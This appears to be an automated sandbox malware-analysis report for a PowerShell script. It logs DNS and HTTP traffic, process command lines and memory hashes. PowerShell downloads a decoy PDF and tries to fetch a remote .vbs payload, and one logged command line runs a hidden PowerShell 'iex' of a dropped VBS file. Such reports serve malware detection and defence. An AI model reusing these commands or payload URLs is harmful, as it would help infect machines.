                                                                                          Dec 19, 2024 12:52:47.641134024 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.641153097 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.776725054 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.776813984 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.776892900 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.776932955 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.776983976 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.782660961 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:48.260114908 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:48.380018950 CET8049720203.175.174.69192.168.2.6
                                                                                          Dec 19, 2024 12:52:48.380122900 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:48.380553007 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:48.500829935 CET8049720203.175.174.69192.168.2.6
                                                                                          Dec 19, 2024 12:52:49.913054943 CET8049720203.175.174.69192.168.2.6
                                                                                          Dec 19, 2024 12:52:49.963270903 CET4972080192.168.2.6203.175.174.69
                                                                                          Dec 19, 2024 12:52:51.000288010 CET4972080192.168.2.6203.175.174.69
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 19, 2024 12:52:44.177407026 CET | 54437 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:52:44.315325022 CET | 53 | 54437 | 1.1.1.1 | 192.168.2.6 |
| Dec 19, 2024 12:52:47.925538063 CET | 62422 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:52:48.259370089 CET | 53 | 62422 | 1.1.1.1 | 192.168.2.6 |
| Dec 19, 2024 12:52:59.054878950 CET | 59689 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:53:13.371503115 CET | 57931 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:53:37.449223995 CET | 62756 | 53 | 192.168.2.6 | 1.1.1.1 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 19, 2024 12:52:44.177407026 CET | 192.168.2.6 | 1.1.1.1 | 0xfb81 | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:52:47.925538063 CET | 192.168.2.6 | 1.1.1.1 | 0x1440 | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:52:59.054878950 CET | 192.168.2.6 | 1.1.1.1 | 0xd645 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:53:13.371503115 CET | 192.168.2.6 | 1.1.1.1 | 0xebab | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:53:37.449223995 CET | 192.168.2.6 | 1.1.1.1 | 0xf403 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 19, 2024 12:52:44.315325022 CET | 1.1.1.1 | 192.168.2.6 | 0xfb81 | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:52:44.315325022 CET | 1.1.1.1 | 192.168.2.6 | 0xfb81 | No error (0) | astenterprises.com.pk | | 107.161.23.150 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:52:48.259370089 CET | 1.1.1.1 | 192.168.2.6 | 0x1440 | No error (0) | www.bluemaxxlaser.com | | 203.175.174.69 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:52:59.192889929 CET | 1.1.1.1 | 192.168.2.6 | 0xd645 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:53:13.587078094 CET | 1.1.1.1 | 192.168.2.6 | 0xebab | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:53:37.587646008 CET | 1.1.1.1 | 192.168.2.6 | 0xf403 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
                                                                                          • www.astenterprises.com.pk
                                                                                          • www.bluemaxxlaser.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49720 | 203.175.174.69 | 80 | 2244 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp: Dec 19, 2024 12:52:48.380553007 CET | Bytes transferred: 80 | Direction: OUT
GET /ms/ms.vbs HTTP/1.1
Host: www.bluemaxxlaser.com
Connection: Keep-Alive

Timestamp: Dec 19, 2024 12:52:49.913054943 CET | Bytes transferred: 516 | Direction: IN
HTTP/1.1 404 Not Found
Date: Thu, 19 Dec 2024 11:52:49 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49714 | 107.161.23.150 | 443 | 2244 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp: 2024-12-19 11:52:45 UTC | Bytes transferred: 127 | Direction: OUT
GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
Host: www.astenterprises.com.pk
Connection: Keep-Alive

Timestamp: 2024-12-19 11:52:46 UTC | Bytes transferred: 217 | Direction: IN
HTTP/1.1 200 OK
Connection: close
content-type: application/pdf
last-modified: Sun, 28 Jan 2024 19:03:01 GMT
accept-ranges: bytes
content-length: 871324
date: Thu, 19 Dec 2024 11:52:45 GMT
server: LiteSpeed
Timestamp: 2024-12-19 11:52:46 UTC | Bytes transferred: 16384 | Direction: IN
Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                          Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                          Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                          Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                          Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                          Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                          Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                          Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                          Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                          Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z

                                                                                          Target ID:0
                                                                                          Start time:06:52:34
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:06:52:34
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:06:52:36
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:06:52:47
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                          Imagebase:0x7ff651090000
                                                                                          File size:5'641'176 bytes
                                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:06:52:48
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                          Imagebase:0x7ff70df30000
                                                                                          File size:3'581'912 bytes
                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:7
                                                                                          Start time:06:52:48
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                          Imagebase:0x7ff7403e0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:8
                                                                                          Start time:06:52:48
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1660,i,1496304434679265413,14723031609339251811,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                          Imagebase:0x7ff70df30000
                                                                                          File size:3'581'912 bytes
                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @_H
                                                                                            • API String ID: 0-518063247
                                                                                            • Opcode ID: 84af642ab3fdbc2845d4f05e3b3b2f294589634478153fb414af71696b33567e
                                                                                            • Instruction ID: 9f60d9e5bed5698f7f0875b47b7f4fe0963c9e31f5dd3c34e8b2ceb5eae18503
                                                                                            • Opcode Fuzzy Hash: 84af642ab3fdbc2845d4f05e3b3b2f294589634478153fb414af71696b33567e
                                                                                            • Instruction Fuzzy Hash: 3411E531B0D7894FEBA5DFA880B85B87BD1EF4A354F1400BEC94DDB283DA29A845C311
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c08a2a5b7bbb4a72ce243d86d3c747a00051eafe7dd2f3a5aa0192583d003b80
                                                                                            • Instruction ID: 0bb24083f460a8c7a5e28df63a3bb16bf63dcc8554ed4df5ccf669ef23de6daa
                                                                                            • Opcode Fuzzy Hash: c08a2a5b7bbb4a72ce243d86d3c747a00051eafe7dd2f3a5aa0192583d003b80
                                                                                            • Instruction Fuzzy Hash: 1EB14832F0EA9E1FE7A99B6858A51F577D1EF86390F0805BED24EC31D3DD1DA8019242
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9d5676db59d899b0c81f69abf8b1c65db7faf9c911559c5946fb24cdd83d2d8
                                                                                            • Instruction ID: 49197714a557c50ede3b6a920de6d0aaa0c01000d1e8554a47ec8b3131357b88
                                                                                            • Opcode Fuzzy Hash: c9d5676db59d899b0c81f69abf8b1c65db7faf9c911559c5946fb24cdd83d2d8
                                                                                            • Instruction Fuzzy Hash: BE21FC22F1EA5E1BE3E99F2C14B51F462C2EF96390B5805BAD24ED31D3DD1EEC416241
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424224054.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34550000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                            • Instruction ID: 6ef5c6aa3e0f780240857f6f5227b953c1c9b81baf09a4b5ae7509f26f333fb6
                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction Fuzzy Hash: 9701843020CB0C4FD754EF0CE051AA5B7E0FB95324F10056DE58AC3661D626E882CB41
Memory Dump Source
• Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 06c03920724274fe04f62db62e38785c7e8c31f5fc5e2e357b52bddea041b5a9
• Instruction ID: 9f5dab1aa39cc75ef696b6d3a3d85e6992e9bad689285b1cf8cd4d61c849121b
